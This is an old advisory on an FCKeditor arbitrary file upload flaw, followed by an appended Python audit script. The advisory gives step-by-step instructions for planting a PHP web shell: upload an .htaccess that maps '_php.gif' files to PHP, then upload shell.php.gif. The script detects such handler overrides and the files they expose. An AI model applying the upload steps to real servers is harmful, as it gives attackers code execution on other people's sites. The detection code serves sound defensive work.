FCKeditor Upload Vulnerability in All PHP Versions
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07

[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author: sinesafe.cn
[+] Website: WwW.sinesafe.cn
-------------------------------------------
1. Create an htaccess file:

code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
-------------------------------------------
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" changes to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now shell is available from server.
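
A defender-side check for the condition described in steps 1 to 4, added here as an example that is not part of the original advisory: it walks an upload directory, flags any .htaccess that assigns a PHP handler, and lists the uploaded files covered by its FilesMatch pattern. The function names and the sample directory contents are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Directives that make Apache treat a file as PHP.
HANDLER_RE = re.compile(r"^[ \t]*(SetHandler|AddHandler|AddType)\b.*php", re.I | re.M)
# Pattern argument of a <FilesMatch ...> section, quoted or not.
FILESMATCH_RE = re.compile(r'<FilesMatch\s+"?([^">]+)"?\s*>', re.I)


def name_matches(pattern, name):
    """Apply a FilesMatch pattern to a file name; unparsable patterns match nothing."""
    try:
        return re.search(pattern, name) is not None
    except re.error:
        return False


def audit_upload_dir(root):
    """Return (override_files, mapped_files) found under an upload directory."""
    overrides, mapped = [], []
    for ht in Path(root).rglob(".htaccess"):
        text = ht.read_text(errors="replace")
        if not HANDLER_RE.search(text):
            continue
        overrides.append(ht)
        patterns = [p.strip() for p in FILESMATCH_RE.findall(text)]
        # A per-directory override applies to its own directory and everything below it.
        for f in ht.parent.rglob("*"):
            if f.is_file() and f.name != ".htaccess" and any(
                    name_matches(p, f.name) for p in patterns):
                mapped.append(f)
    return sorted(overrides), sorted(mapped)


def build_sample(root):
    """Constructed sample: the override from the write-up plus two uploads."""
    root = Path(root)
    (root / ".htaccess").write_text(
        '<FilesMatch "_php.gif">\n    SetHandler application/x-httpd-php\n</FilesMatch>\n')
    (root / "shell_php.gif").write_text("constructed placeholder, not a real payload\n")
    (root / "photo.gif").write_bytes(b"GIF89a")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_sample(d)
        overrides, mapped = audit_upload_dir(d)
        print("handler overrides:", [str(p) for p in overrides])
        print("files mapped to PHP:", [str(p) for p in mapped])
```

Setting `AllowOverride None` for the upload directory in the main server configuration makes Apache ignore any .htaccess placed there, so a finding from this audit is also a prompt to check that setting.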